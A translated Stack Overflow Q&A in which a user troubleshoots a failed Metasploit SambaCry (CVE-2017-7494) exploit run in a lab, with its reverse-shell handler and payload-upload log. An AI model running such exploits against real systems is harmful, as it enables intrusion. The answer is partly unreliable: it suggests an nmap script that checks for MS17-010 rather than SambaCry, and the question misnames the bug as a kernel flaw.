首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >无法使用metasploit利用samba cry的有效性

无法使用metasploit利用samba cry的有效性
EN

Stack Overflow用户
提问于 2017-06-23 17:13:52
回答 1查看 3.9K关注 0票数 0

我正在尝试利用linux内核漏洞samba CVE (CVE-2017-7494)进行一些使用metasploit框架的研究工作。但是我得到以下错误: msf exploit(is_known_pipename) > run

代码语言:javascript
复制
[*] Started reverse TCP handler on 192.168.78.136:4444 
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the 
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to 
\\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path  
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.

是因为我的目标主机不可验证还是其他问题?我的目标主机是samba版本- 3.6.23,据我所知它是有效的。

谢谢

EN

回答 1

Stack Overflow用户

发布于 2017-07-03 23:24:16

加载STATUS_OBJECT_NAME_NOT_FOUND失败意味着“找不到对象名称”。可能metasploit无法上载共享文件夹中的负载。您是否可以尝试执行nmap并验证该漏洞的存在?该命令为nmap -p445 --script smb-vuln-ms17-010 TARGET_IP

票数 1
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/44717579

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档